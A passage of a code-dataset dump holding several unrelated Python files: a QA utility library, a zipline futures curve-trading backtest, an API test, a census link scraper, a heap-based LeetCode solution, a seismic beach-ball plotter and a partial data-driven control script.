%(module)-12s: %(funcName)-15s: %(lineno)-4s %(message)s\"\r\n lg = log.getLogger()\r\n handler = RotatingFileHandler(LOGFILEPATH, 'a', 10000000, 100) #handler = PUBHandler('tcp://127.0.0.1:12345')\r\n formatter = log.Formatter(LOGFORMAT)\r\n handler.setFormatter(formatter)\r\n lg.addHandler(handler)\r\n lg.setLevel(LOGLEVEL)\r\n #log.basicConfig(format=LOGFORMAT, filename=LOGFILEPATH, level=LOGLEVEL)\r\n return\r\n\r\nclass ValidationFailure(RuntimeWarning):\r\n pass\r\n\r\nclass ValidationError(RuntimeWarning):\r\n pass\r\n\r\nclass RetryWarning(RuntimeWarning):\r\n pass\r\n\r\nclass ExecutionTrace(RuntimeWarning):\r\n pass\r\n\r\nclass DataGenerationFailure(RuntimeWarning):\r\n pass\r\n\r\nclass Notice(RuntimeWarning):\r\n pass\r\n\r\nclass ServiceError(RuntimeWarning):\r\n pass\r\n\r\nclass ApplicationError(RuntimeWarning):\r\n pass\r\n\r\ndef debug(msg):\r\n if isDebug():\r\n notice(msg)\r\n return\r\n\r\ndef validationFailure(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=ValidationFailure, stacklevel=2)\r\n return\r\n\r\ndef validationError(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=ValidationError, stacklevel=2)\r\n return\r\n\r\ndef retryWarning(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=RetryWarning, stacklevel=2)\r\n return\r\n\r\ndef traceMsg(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=ExecutionTrace, stacklevel=3)\r\n return\r\n\r\ndef dataGenerationFailure(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=DataGenerationFailure, stacklevel=2)\r\n return\r\n\r\ndef notice(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=Notice, stacklevel=2)\r\n return\r\n\r\ndef serviceError(msg, stacklevel=2):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=ServiceError, stacklevel=stacklevel)\r\n return\r\n\r\ndef applicationError(msg):\r\n w.warn(\"%s: %s\"%(ctime(),msg), category=ApplicationError, stacklevel=2)\r\n return\r\n\r\ndef trace(frame, event, arg):\r\n import threading as t\r\n name = t.current_thread().name\r\n if event == \"exception\":\r\n print(\"Thread exception trace: %s Kind is %s. What is %s. frame = %s\"%(name, event, arg, frame))\r\n return\r\n\r\ndef setIgnoreTrace():\r\n w.simplefilter(action=\"ignore\", category=ExecutionTrace)\r\n return\r\n\r\ndef setIgnoreNotice():\r\n w.simplefilter(action=\"ignore\", category=Notice)\r\n return\r\n\r\ndef DBIterator(rsltCursor, bufsize=100):\r\n \"\"\"\r\n Using the rslts from rsltCursor, incrementally fetch records from DB.\r\n \"\"\"\r\n rows = rsltCursor.fetchmany(bufsize)\r\n while rows is not None and len(rows) > 0:\r\n for row in rows:\r\n yield row\r\n rows = rsltCursor.fetchmany(bufsize)\r\n return\r\n\r\ndef chunk(sz, iterable):\r\n \"Return first n items of the iterable as a list\"\r\n #return tee(iterable, sz)\r\n for x in range(sz):\r\n yield next(iterable)\r\n\r\nclass TraceTimer(object):\r\n \"\"\"\r\n Prints trace messages and execution time of functions.\r\n \"\"\"\r\n def __init__(self, func):\r\n self.__func = func\r\n update_wrapper(self, self.__func)\r\n self.__name__ = func.__name__\r\n self.__doc__ = func.__doc__\r\n self.__dict__.update(func.__dict__)\r\n return\r\n def __call__(self, *args, **kw):\r\n rslt = None\r\n t1 = time()\r\n try:\r\n if \"__DEBUG__\" in globals(): traceMsg(\"Running %s with args %s\"%(self.__func.__qualname__, args if args else kw))\r\n rslt = self.__func(*args, **kw)\r\n except Exception as e:\r\n serviceError(\"Exception in %s because %s\"%(self.__func.__qualname__, e), 3)\r\n tb.print_tb(sys.exc_info()[2])\r\n raise e\r\n finally:\r\n t2 = time()\r\n if \"__DEBUG__\" in globals(): traceMsg(\"%s has an execution time of %f\"%(self.__func.__qualname__, t2 - t1))\r\n return rslt\r\n\r\ndef loadPropertiesFile(filename: str) -> dict:\r\n \"\"\"\r\n load a java properties file as a dict.\r\n \"\"\"\r\n import jprops\r\n rslt = None\r\n with open(filename, \"rb\") as f:\r\n rslt = jprops.load_properties(f)\r\n return rslt\r\n\r\n\r\nclass Delay(object):\r\n def __init__(self, sec):\r\n self.__seconds = sec\r\n return\r\n def __call__(self, func):\r\n self.__func = func\r\n @wraps(self.__func)\r\n def wrapper(*args, **kw):\r\n sleep(self.__seconds)\r\n rslt = self.__func(*args, **kw)\r\n return rslt\r\n return wrapper\r\n\r\nclass ArgsValid(object):\r\n def __init__(self, func):\r\n self.__func = func\r\n update_wrapper(self, self.__func)\r\n return\r\n def __call__(self, *args, **kw):\r\n if \"__DEBUG__\" in globals():\r\n if args is not None and len(args):\r\n for i, x in enumerate(args, 1):\r\n assert x is not None, \"argument #%s is not valid.\"\r\n if kw is not None and len(kw):\r\n for k, v in kw.items():\r\n assert v is not None, \"Keyword argument %s is not valid.\"%k\r\n return self.__func(*args, **kw)\r\n\r\nclass RunAround(object):\r\n def __init__(self, before, after, beforeargs=None, afterargs=None):\r\n self.__before = before\r\n self.__after = after\r\n self.__bargs = beforeargs\r\n self.__aargs = afterargs\r\n return\r\n def __call__(self, func):\r\n self.__func = func\r\n @wraps(self.__func)\r\n def wrapped(*args, **kw):\r\n rslt = None\r\n if isinstance(self.__before, [Function]): self.__before(self.__bargs)\r\n rslt = self.__func(*args, **kw)\r\n if isinstance(self.__after, [Function]):self.__after(self.__aargs)\r\n return rslt\r\n return wrapped\r\n\r\ndef genRandomStr(count: int):\r\n \"\"\"\r\n generate a random string of length count.\r\n \"\"\"\r\n from random import choice\r\n printable = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~ \\t\\n\\r'\r\n rslt = []\r\n for i in range(count + 1):\r\n rslt.append(choice(printable))\r\n return \"\".join(rslt)\r\n\r\n\r\n\r\n\r\ndef coroutine(func):\r\n @wraps(func)\r\n def wrapper(*args, **kw):\r\n rslt = func(*args, **kw)\r\n next(rslt)\r\n return rslt\r\n return wrapper\r\n\r\nXSLTNS = {\"apriva\": \"http://www.activations.aprivasen.com/\", \"soap\": \"http://schemas.xmlsoap.org/soap/envelope/\"}\r\n@TraceTimer\r\ndef getElementText(element, localname, namespaces=XSLTNS.copy()):\r\n \"\"\"\r\n Grab the first element matching localname and return its text.\r\n \"\"\"\r\n rslt = \"\"\r\n finder = et.XPath(\".//*[local-name() = $name]\", namespaces=namespaces)\r\n targ = finder(element, name=localname)\r\n if targ is not None and len(targ) > 0:\r\n rslt = str(targ[0].text)\r\n else:\r\n notice(\"Element %s not found.\"%localname)#.with_traceback(sys.exc_info()[2])\r\n return rslt\r\n\r\n@TraceTimer\r\ndef getAttrText(element, localname,\r\n namespaces=XSLTNS.copy()):\r\n \"\"\"\r\n Grab the first attribute matching localname, ignoring namespaces, and return its text.\r\n \"\"\"\r\n rslt = \"\"\r\n finder = et.XPath(\".//@*[local-name() = $name]\", namespaces=namespaces)\r\n targ = finder(element, name=localname)\r\n if targ is not None and len(targ):\r\n rslt = str(targ[0])\r\n else:\r\n notice(\"Attribute %s not found.\"%localname)#.with_traceback(sys.exc_info()[2])\r\n return rslt\r\n\r\n@TraceTimer\r\ndef getElement(element, localname, namespaces=XSLTNS.copy()):\r\n \"\"\"\r\n Grab the first element with the given tag name. Ignores namespaces.\r\n \"\"\"\r\n rslt = None\r\n finder = et.XPath(\".//*[local-name() = $name]\", namespaces=namespaces)\r\n targ = finder(element, name=localname)\r\n rslt = targ[0] if (targ is not None and len(targ) > 0) else None\r\n return rslt\r\n\r\ndef getElementList(element, localname, namespaces=XSLTNS.copy()):\r\n finder = et.XPath(\".//*[local-name() = $name]\", namespaces=namespaces)\r\n return finder(element, name=localname)\r\n\r\n\r\ndef genID(length=22):\r\n \"\"\"\r\n generate a unique ID of the given length. Numeric only.\r\n If length is zero then an empty string is generated.\r\n \"\"\"\r\n from random import randint\r\n assert length >= 1, \"length must be greater than zero.\"\r\n o = uuid4()\r\n h1 = abs(hash(o.bytes))\r\n h2 = abs(hash(o.int + randint(0, 1000)))\r\n padded = \"%%0%sd%%0%sd\"%(length/2, length/2)\r\n h = padded%(h1,h2)\r\n rfmt = \"%%0%ss\"%length\r\n rslt = rfmt%h\r\n return rslt if len(rslt) < length else rslt[0:length]\r\n\r\ndef parallelize(lambdagen: Generator or Iterator, pool: Executor, donecb: Function, errorcb: Function) -> None:\r\n \"\"\"\r\n Run a list or generator of functions in a thread pool. Results sent to the donecb callback, Exceptions are sent to the errorcb ballback.\r\n :param lambdagen: Generator that produces functions that have no parameters\r\n :param pool: This will be a ThreadPoolExecutor\r\n :param donecb: This is a callback that is called with the result\r\n :param errorcb: This is a callback that is called with an Exception object\r\n :return: None is returned.\r\n \"\"\"\r\n with pool:\r\n functions = chunk(100, lambdagen)\r\n while functions is not None:\r\n for x in as_completed([pool.submit(f) for f in functions]):\r\n try:\r\n if donecb is not None: donecb(x.result())\r\n except Exception as e:\r\n serviceError(\"parallelize received an exception from thread because %s\"%e)\r\n if errorcb is not None: errorcb(e)\r\n functions = chunk(100, lambdagen)\r\n return\r\n\r\n#@TraceTimer\r\ndef batchedPoolRunner(testgenfunc: Function, dispatchfunc: Function, pool: Executor, size: int, validator: Function) -> int:\r\n \"\"\"\r\n Given a concurrent.futures.pool run the tuples produced by testgenfunc in size chunks. \r\n Submit results back to pool using dispatchfunc and the returned result of the func.\r\n \r\n testgenfunc is a function generator that produces a tuple with function to run and parameters to the func.\r\n The testgenfunc must return a two tuple with a function in the first position and the function parameters \r\n in the second position as a dictionary.\r\n dispatchfunc must return an object, list or tuple and these should be compatible with its own inputs.\r\n POOL can be a ThreadPoolExecutor or a ProcessPoolExecutor\r\n size is the processing batch size for submitting to the pool.\r\n testgenfunc should produce tuple with the first element as the function and the second element the \r\n parameters to the function\r\n\r\n NOTE: never create a generator that produces closures. Python internally updates the closure in place \r\n instead of creating a new one so you'll effectively have the same closure produced throughout the \r\n generators life. It's a nasty bug.\r\n\r\n *** Currently Doesn't work on Process Pools. Working on a solution.\r\n \"\"\"\r\n td = testgenfunc()\r\n futures = set([pool.submit(f, **p) for f, p in chunk(size, td)])\r\n count = 0\r\n debug(\"batchedPoolRunner: Starting main loop.\") \r\n while len(futures) > 0:\r\n done = set()\r\n for job in as_completed(futures):\r\n if count % 1000 == 0 : gc.collect()\r\n rslt = job.result() if job is not None else None\r\n if rslt is not None:\r\n if not validator(rslt):\r\n validationFailure(\"Test case for %s failed validation.\"%rslt.Function)\r\n else:\r\n serviceError(\"FutureResult from thread pool is None.\")\r\n done.add(job)\r\n count += 1\r\n #futures.remove(job)\r\n if dispatchfunc is not None:\r\n #debug(\"Running dispatchfunc %s.\"%dispatchfunc.__name__)\r\n if rslt: futures.add(pool.submit(dispatchfunc, rslt)) \r\n sys.stdout.write(\".\")\r\n sys.stdout.flush()\r\n futures = futures - done\r\n if len(futures) < 1000: \r\n debug(\"Adding new jobs\")\r\n futures.update(set([pool.submit(f, **p) for f, p in chunk(size, td)]))\r\n debug(count)\r\n return count\r\n","repo_name":"stormcoder/qa-lib","sub_path":"QAFramework.py","file_name":"QAFramework.py","file_ext":"py","file_size_in_byte":20135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5608121359","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nget_ipython().run_line_magic('matplotlib', 'notebook')\n\nimport zipline\nfrom zipline.api import future_symbol, set_commission, set_slippage, schedule_function, date_rules, time_rules, continuous_future, order_target\n\nfrom datetime import datetime\nimport pytz\nimport matplotlib.pyplot as plt\nimport pyfolio as pf\nimport pandas as pd\nimport numpy as np\n\nfrom zipline.finance.commission import PerTrade, PerContract\nfrom zipline.finance.slippage import FixedSlippage, VolatilityVolumeShare\n\n# We'll use this to find a future date, X months out.\nfrom dateutil.relativedelta import relativedelta\n\n# settings\nspread_months = 12 \npos_per_side = 5\ntarget_exposure_per_side = 1.5\ninitial_portfolio_millions = 1\nvolume_order_cap = 0.25\n\n\n# DataFame for storing and updating the data that we want to graph\ndynamic_results = pd.DataFrame()\n\nfig = plt.figure(figsize=(10, 6))\nax = fig.add_subplot(211)\nax.set_title('Curve Trading')\nax2 = fig.add_subplot(212)\nax2.set_title('Drawdown')\n\ndef initialize(context):\n \"\"\"\n Friction Settings\n \"\"\"\n context.enable_commission = True\n context.enable_slippage = True \n \n if context.enable_commission:\n comm_model = PerContract(cost=0.85, exchange_fee=1.5)\n else:\n comm_model = PerTrade(cost=0.0)\n set_commission(us_futures=comm_model)\n \n if context.enable_slippage:\n slippage_model=VolatilityVolumeShare(volume_limit=0.3)\n else:\n slippage_model=FixedSlippage(spread=0.0) \n set_slippage(us_futures=slippage_model)\n \n \"\"\"\n Markets to trade\n \"\"\" \n most_liquid_commods = [\n 'CL','HO','RB','NG','GC','LC','_C','_S','_W','SB', 'HG', 'CT', 'KC'\n ]\n \n context.universe = [\n continuous_future(market, offset=0, roll='volume', adjustment='mul') \n for market in most_liquid_commods \n ]\n \n schedule_function(weekly_trade, date_rules.week_start(), time_rules.market_close()) \n \n schedule_function(update_chart,date_rules.month_start(), time_rules.market_close()) \n \ndef update_chart(context,data):\n # This function continuously update the graph during the backtest\n today = data.current_session.date()\n pv = context.portfolio.portfolio_value\n exp = context.portfolio.positions_exposure\n dynamic_results.loc[today, 'PortfolioValue'] = pv\n \n drawdown = (pv / dynamic_results['PortfolioValue'].max()) - 1\n exposure = exp / pv\n dynamic_results.loc[today, 'Drawdown'] = drawdown\n \n if ax.lines:\n ax.lines[0].set_xdata(dynamic_results.index)\n ax.lines[0].set_ydata(dynamic_results.PortfolioValue)\n ax2.lines[0].set_xdata(dynamic_results.index)\n ax2.lines[0].set_ydata(dynamic_results.Drawdown)\n else:\n ax.plot(dynamic_results.PortfolioValue)\n ax2.plot(dynamic_results.Drawdown)\n \n ax.set_ylim(\n dynamic_results.PortfolioValue.min(),\n dynamic_results.PortfolioValue.max()\n )\n ax.set_xlim(\n dynamic_results.index.min(),\n dynamic_results.index.max()\n )\n ax2.set_ylim(\n dynamic_results.Drawdown.min(),\n dynamic_results.Drawdown.max()\n )\n ax2.set_xlim(\n dynamic_results.index.min(),\n dynamic_results.index.max()\n )\n \n fig.canvas.draw()\n\n\ndef weekly_trade(context, data):\n # Empty DataFrame to be filled in later.\n carry_df = pd.DataFrame(index = context.universe)\n \n for continuation in context.universe:\n # Get the chain\n chain = data.current_chain(continuation)\n\n # Transform the chain into dataframe\n df = pd.DataFrame(index = chain)\n for contract in chain:\n df.loc[contract, 'future'] = contract\n df.loc[contract, 'expiration_date'] = contract.expiration_date\n\n # Locate the contract closest to the target date.\n # X months out from the front contract.\n closest_expiration_date = df.iloc[0].expiration_date\n target_expiration_date = closest_expiration_date + relativedelta(months=+spread_months)\n df['days_to_target'] = abs(df.expiration_date - target_expiration_date) \n target_contract = df.loc[df.days_to_target == df.days_to_target.min()]\n \n # Get prices for front contract and target contract\n prices = data.current(\n [\n df.index[0], \n target_contract.index[0]\n ],\n 'close'\n )\n \n # Check the exact day difference between the contracts\n days_to_front = int(\n (target_contract.expiration_date - closest_expiration_date)[0].days\n )\n \n # Calculate the annualized carry\n annualized_carry = (np.power(\n (prices[0] / prices[1]), (365 / days_to_front))\n ) - 1\n \n carry_df.loc[continuation, 'front'] = df.iloc[0].future\n carry_df.loc[continuation, 'next'] = target_contract.index[0]\n carry_df.loc[continuation, 'carry'] = annualized_carry\n \n # Sort on carry\n carry_df.sort_values('carry', inplace=True, ascending=False)\n carry_df.dropna(inplace=True)\n \n new_portfolio = []\n new_longs = []\n new_shorts = []\n \n # Contract Selection\n for i in np.arange(0, pos_per_side): \n j = -(i+1)\n \n # Buy top, short bottom\n long_contract = carry_df.iloc[i].next\n short_contract = carry_df.iloc[j].next\n \n new_longs.append(long_contract)\n new_shorts.append(short_contract)\n\n # Get data for the new portfolio\n new_portfolio = new_longs + new_shorts\n hist = data.history(new_portfolio, fields=['close','volume'], \n frequency='1d', \n bar_count=10,\n )\n \n # Simple Equal Weighted\n target_weight = (\n target_exposure_per_side * context.portfolio.portfolio_value \n ) / pos_per_side\n \n # Trading\n for contract in new_portfolio:\n # Slice history for contract\n h = hist.xs(contract, 2)\n \n # Equal weighted, with volume based cap.\n contracts_to_trade = target_weight / contract.price_multiplier / h.close[-1]\n \n # Position size cap\n contracts_cap = int(h['volume'].mean() * volume_order_cap)\n \n # Limit trade size to position size cap.\n contracts_to_trade = min(contracts_to_trade, contracts_cap)\n \n # Negative position for shorts\n if contract in new_shorts:\n contracts_to_trade *= -1\n \n # Execute\n order_target(contract, contracts_to_trade)\n\n # Close any other open position\n for pos in context.portfolio.positions:\n if pos not in new_portfolio:\n order_target(pos, 0.0)\n\nstart = datetime(2001, 1, 1, 8, 15, 12, 0, pytz.UTC)\nend = datetime(2018, 12, 30, 8, 15, 12, 0, pytz.UTC)\n\nperf = zipline.run_algorithm(\n start=start, end=end, \n initialize=initialize, \n capital_base=initial_portfolio_millions * 1000000, \n data_frequency = 'daily', \n bundle='futures' ) \n\n\n\n\n# In[7]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nreturns, positions, transactions = pf.utils.extract_rets_pos_txn_from_zipline(perf)\npf.create_returns_tear_sheet(returns, benchmark_rets=None)\n\n\n# In[8]:\n\n\nperf.portfolio_value.to_csv('curve_trading.csv')\n\n","repo_name":"sherrytp/TradingEvolved","sub_path":"Chapter 18 - Curve Trading/Curve Trading.py","file_name":"Curve Trading.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28980269839","text":"import requests\n\n\ndef test_update_task_by_id():\n payload = {\n \"completed\": true\n }\n endpoint = (\"https://api-nodejs-todolist.herokuapp.com/task/5ddcd1566b55da0017597239\")\n response = requests.put(url=endpoint, json=payload)\n response_body = response.json()\n assert response.headers[\"content-type\"] == \"application/json; charset=utf-8\"\n assert response.status_code == 200\n print(response.status_code)\n print(response.text)\n print(response_body)","repo_name":"asanmukh/API_test","sub_path":"Update_task_by_id.py","file_name":"Update_task_by_id.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74662050724","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#importing packages\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\nimport re\n\n\n# In[2]:\n\n\n#defining URL\nurl= \"https://www.census.gov/programs-surveys/popest.html\"\n\n\n# In[3]:\n\n\n#sending/retrieving requests for response\nr= requests.get(url)\n\n\n# In[4]:\n\n\nhtml= r.text\n#parsing html using BeautifulSoup\ncensus= BeautifulSoup(html, 'html.parser')\n\n\n# In[5]:\n\n\nfind= census.find_all(\"a\")\n\n\n# In[6]:\n\n\nlen(find)\n\n\n# In[7]:\n\n\nlinks= set()\n\n\n# In[8]:\n\n\nfor link in find:\n hrefs= str(link.get(\"href\"))\n if hrefs.startswith('#http'):\n links.add((hrefs[1:]))\n elif hrefs.startswith('None'):\n ''\n elif hrefs.startswith('#'):\n ''\n elif hrefs.startswith('/'):\n links.add('https://www.census.gov' +hrefs)\n elif hrefs.endswith('.gov'):\n links.add(hrefs + '/')\n else:\n links.add(hrefs)\n\n\n# In[9]:\n\n\nlen(links)\n\n\n# In[10]:\n\n\nfile= open('my_export.csv', 'w')\n\n\n# In[11]:\n\n\nwrite= csv.writer(file, delimiter=' ', lineterminator='\\r')\n\n\n# In[12]:\n\n\nlinks_list= []\n\n\n# In[13]:\n\n\nfor x in links:\n links_list.append(x)\n if not links_list:\n write.writerow(links_list)\n else:\n del(x)\n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"SPedigo/Web_scraping","sub_path":"C996.py","file_name":"C996.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7090776638","text":"import heapq\n\nclass Solution:\n def kSmallestPairs(self, nums1: List[int], nums2: List[int], k: int) -> List[List[int]]:\n # create the object to store the sums in and use for comparing\n queue = [(nums1[i] + nums2[0], i, 0) for i in range(len(nums1))]\n heapq.heapify(queue)\n \n answer = []\n while queue:\n _, num1_col, num2_col = heapq.heappop(queue)\n answer.append([nums1[num1_col], nums2[num2_col]])\n k -= 1\n \n if not k:\n break\n \n num2_col += 1\n \n if num2_col == len(nums2):\n continue\n \n heapq.heappush(queue, (nums1[num1_col] + nums2[num2_col], num1_col, num2_col))\n \n return answer","repo_name":"ffekirnew/a2sv-competitive-programming","sub_path":"373-find-k-pairs-with-smallest-sums/373-find-k-pairs-with-smallest-sums.py","file_name":"373-find-k-pairs-with-smallest-sums.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5091730043","text":"import os\r\nimport sys\r\nimport struct\r\nimport platform\r\nimport subprocess\r\nimport matplotlib\r\nmatplotlib.use(\"agg\")\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as mticker \r\nfrom multiprocessing import Pool\r\n\r\n#读取震源机制解二进制能量数据文件 hjq\r\ndef readBeachBallData(path):\r\n x = []\r\n y = []\r\n f = open(path, 'rb')\r\n for i in range(3601):\r\n for j in range(1801):\r\n data = f.read(4)\r\n amp = struct.unpack(\"f\", data)[0]\r\n if amp > 0:\r\n x.append(i/10)\r\n y.append(j/10)\r\n f.close()\r\n return x, y\r\n\r\n\r\ndef genBeachBallTexture(abspath, paraType, faultType, paras, fileName):\r\n \"\"\"\r\n 生成震源机制解沙滩球纹理图片\r\n paraType: 计算震源机制解的参数类型,MomentTensor-矩张量;FaultPara-断层参数\r\n faultType: 断层类型, 0-正;1-逆;2-走滑;4-其他\r\n paras: 震源机制解参数,如果是MomentTensor类型,需要6个参数,mrr mtt mff mrt mrf mtf;如果是FaultPara,需要3个参数,strike dip rake\r\n fileName: 震源机制解输入文件路径(不带后缀)\r\n out: 在fileName同目录下输出fileName.dat(能量数据)和fileName.png(沙滩球绘制数据)两个文件\r\n \"\"\"\r\n res = {\r\n 'status':'fail',\r\n 'info':[],\r\n 'data':None,\r\n }\r\n dataFile = fileName + \".dat\"\r\n if paraType == \"MomentTensor\" and len(paras) == 6:\r\n # 执行命令行程序\r\n parPath = str(paras[0]) + \" \" + str(paras[1]) + \" \" + str(paras[2]) + \" \" + str(paras[3]) + \" \" + str(paras[4]) + \" \" + str(paras[5]) + \" \" + dataFile\r\n cur_sys = platform.system()\r\n if cur_sys == \"Windows\":\r\n exePath = os.path.join(abspath, 'calBeachBallData.exe')\r\n process = subprocess.Popen(exePath + \" \" + parPath)\r\n process.wait()\r\n elif cur_sys == \"Linux\" or cur_sys == \"Darwin\":\r\n exePath = os.path.join(abspath, 'calBeachBallData')\r\n process = subprocess.Popen(exePath + \" \" + parPath, shell=True)\r\n process.wait()\r\n else:\r\n res['info'].append(\"未识别的操作系统:\" + cur_sys)\r\n return res\r\n elif paraType == \"FaultPara\" and len(paras) == 3:\r\n # 执行命令行程序\r\n parPath = str(paras[0]) + \" \" + str(paras[1]) + \" \" + str(paras[2]) + \" \" + dataFile\r\n cur_sys = platform.system()\r\n if cur_sys == \"Windows\":\r\n exePath = os.path.join(abspath, 'calBeachBallData.exe') \r\n process = subprocess.Popen(exePath + \" \" + parPath)\r\n process.wait()\r\n elif cur_sys == \"Linux\" or cur_sys == \"Darwin\":\r\n exePath = os.path.join(abspath, 'calBeachBallData') \r\n process = subprocess.Popen(exePath + \" \" + parPath, shell=True)\r\n process.wait()\r\n else:\r\n res['info'].append(\"未识别的操作系统:\" + cur_sys)\r\n return res\r\n else:\r\n res['info'].append(\"类型错误或者类型与参数个数不匹配\")\r\n return res\r\n\r\n x, y = readBeachBallData(dataFile)\r\n \r\n plt.rcParams.update({'figure.figsize':(5,4), 'figure.dpi':200})\r\n\r\n # 刻度朝内\r\n # plt.rcParams['xtick.direction']='in'\r\n # plt.rcParams['ytick.direction']='in'\r\n\r\n # 0-正断层;1-逆断层;2-走滑断层;3-其他\r\n if faultType == 0:\r\n plt.plot(x, y, 'o', color='green', markersize=0.1, zorder=0)\r\n elif faultType == 1:\r\n plt.plot(x, y, 'o', color='red', markersize=0.1, zorder=0)\r\n elif faultType == 2:\r\n plt.plot(x, y, 'o', color='blue', markersize=0.1, zorder=0)\r\n else:\r\n plt.plot(x, y, 'o', color='yellow', markersize=0.1, zorder=0)\r\n\r\n plt.xlim(0, 360) # 设置x轴的数值显示范围\r\n plt.ylim(0, 180) # 设置y轴的数值显示范围\r\n\r\n # 不显示边框和刻度\r\n plt.axis('off')\r\n plt.subplots_adjust(left=0, bottom=0, right=1.0, top=1.0, hspace=0.1, wspace=0.1)\r\n\r\n # 显示边框和刻度\r\n # plt.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, hspace=0.1, wspace=0.1)\r\n\r\n # plt.rcParams['font.sans-serif'] = ['SimHei'] #显示中文标签\r\n # plt.rcParams['axes.unicode_minus'] = False\r\n # plt.xlabel(\"方位角\", fontsize=14)\r\n # plt.ylabel(\"离源角\", fontsize=14)\r\n # x_major_locator=plt.MultipleLocator(60)\r\n # y_major_locator=plt.MultipleLocator(45)\r\n # ax=plt.gca()\r\n # ax.xaxis.set_major_locator(x_major_locator)\r\n # ax.yaxis.set_major_locator(y_major_locator)\r\n # ax.axes.xaxis.set_ticklabels([])\r\n # ax.axes.yaxis.set_ticklabels([])\r\n # ax.xaxis.set_major_formatter(mticker.FormatStrFormatter('%d°'))\r\n # ax.yaxis.set_major_formatter(mticker.FormatStrFormatter('%d°'))\r\n\r\n plt.savefig(fname=fileName+\".png\")\r\n plt.close()\r\n\r\n os.remove(dataFile)\r\n \r\n res['status'] = \"success\"\r\n return res\r\n\r\nif __name__ == '__main__':\r\n\r\n WORK_DIR = ''\r\n if hasattr(sys,'frozen'):\r\n WORK_DIR = os.path.dirname(sys.executable)\r\n else:\r\n WORK_DIR = os.path.dirname(__file__)\r\n\r\n # 多线程运行,提升效率\r\n pool_size = 10\r\n pool = Pool(pool_size)\r\n\r\n paraType = sys.argv[1]\r\n paraNum = int(sys.argv[2])\r\n if paraType == \"MomentTensor\":\r\n for i in range(paraNum):\r\n faultType = int(sys.argv[8*i+3])\r\n paras = []\r\n for j in range(6):\r\n paras.append(float(sys.argv[8*i+4+j]))\r\n outfile = sys.argv[8*i+10]\r\n pool.apply_async(genBeachBallTexture, args=(WORK_DIR, paraType, faultType, paras, outfile))\r\n elif paraType == \"FaultPara\":\r\n for i in range(paraNum):\r\n faultType = int(sys.argv[5*i+3])\r\n paras = []\r\n for j in range(3):\r\n paras.append(float(sys.argv[5*i+4+j]))\r\n outfile = sys.argv[5*i+7]\r\n pool.apply_async(genBeachBallTexture, args=(WORK_DIR, paraType, faultType, paras, outfile))\r\n \r\n pool.close()\r\n pool.join()","repo_name":"xhymf1992/beach-ball","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39388288537","text":"from math import ceil\nimport numpy as np \nimport cvxpy as cp \nimport random\nimport matplotlib.pyplot as plt\nfrom numpy.linalg import matrix_rank\n\nif __name__ == '__main__':\n # Define system\n A = np.array([[1.01,0.01,0],[0.01,1.01,0.01],[0,0.01,1.01]])\n B = np.eye(3)\n C = np.eye(3)\n (n,m) = B.shape # n = number of states, m = number of inputs\n p = n # p = number of output\n \n # Cost weight\n Q = np.eye(3)\n R = np.eye(3)*1000\n \n # Simulation \n x0 = np.array([[0],[0],[1]])\n t_step = 0.1\n t_sim = 5.1; # simulation time\n n_sim = ceil(t_sim/t_step) # Number of simulation step\n x = x0; \n xLog = np.empty((n,n_sim+1)); \n xLog[:,[0]] = x0; \n uLog = np.empty((m,n_sim));\n \n # Generate random input sequence\n np.random.seed(1)\n u_seq = np.array(np.random.rand(m,n_sim))\n\n # Collect data\n for t in range(n_sim):\n u = u_seq[:, t].reshape(m, 1)\n x = A@x+B@u\n uLog[:,[t]] = u \n xLog[:,[t+1]] = x\n \n # Create Hankel_U matrix\n # condition: T - T_f + 1 >= T_f*m\n T_ini = 3\n N = 5\n T_L = T_ini + N \n nB = 3\n T_f = T_ini + N + nB #13\n T = n_sim #51 51 - 8 + 1 = 44\n Hankel_U = np.empty((T_L*m,T-T_L+1))\n Hankel_Y = np.empty((T_L*p,T-T_L+1))\n for i in range(T_L):\n Hankel_U[m*i:m*(i+1),:] = u_seq[:,i:T-T_L+i+1]\n Hankel_Y[p*i:p*(i+1),:] = xLog[:,i+1:T-T_L+i+2]\n \n # Construct U_p, U_f, Y_p, Y_f \n U_p = Hankel_U[:m*T_ini,:] \n U_f = Hankel_U[m*T_ini:,:]\n\n Y_p = Hankel_Y[:m*T_ini,:]\n Y_f = Hankel_Y[m*T_ini:,:]\n \n Hankel_PF = np.block([[U_p],[Y_p],[U_f],[Y_f]])\n # print(U_p.shape)\n # print(Hankel_PF.shape)\n \n # Construct ini_matrix\n ini_matrix = np.empty((n*m+n*p,1))\n ini_matrix[:n*m,:] = np.reshape(u_seq[:,-n:],(-1, 1), order='F') # last n element\n ini_matrix[n*m:n*m+n*p,:] = np.reshape(xLog[:,-n:],(-1, 1), order='F') # last n element\n print(ini_matrix.shape)\n \n # BB = np.block([[u_seq[:,-1].reshape(m, 